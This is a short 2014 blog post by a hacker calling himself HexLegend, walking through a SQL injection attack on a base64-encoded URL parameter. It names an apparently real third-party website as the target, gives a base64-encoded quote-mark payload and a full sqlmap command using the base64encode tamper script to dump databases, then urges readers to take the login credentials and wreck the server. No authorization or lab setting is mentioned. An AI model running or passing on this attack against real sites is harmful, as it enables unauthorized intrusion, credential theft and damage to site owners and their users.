Facebook

Saturday, January 11, 2014

SQL INJECTION BASE64ENCODE

SQL Injection base64encode
Hey guys its me HexLegend
Today Let me show you Sql injection attack
Yeah yeah I know everybody know that attack but let me show you something else

Target => http://www.nethomes.in

Sometime parameter is encoded in base64 and we have to encode our payload to exploit it

so what we need

Tools => HACKBAR,SQLmap [if you are too lazy like me]

Lets Start



as you see its 34
now our famous symbol (') and than encode it to base64encode by going to
Encoding in Hackbar
34'=MzQn



Ok now hit enter



Checking type of SQL injection



Now Open SQLmap

and Lets start



"C:\lolz>sqlmap.py -u http://target.com/page.php?id=MzQ= --dbms=My
sql --random-agent --tamper=base64encode.py --technique=E --dbs"

Now you Get Login credential
Login and F**k the server

Greets
================
Not want to greet specific person because all of you are my bro's
Take care and please pray for me i am preparing for CSS exam
Remember me in you prayers
================
HexLegend :)

0 comments:

Post a Comment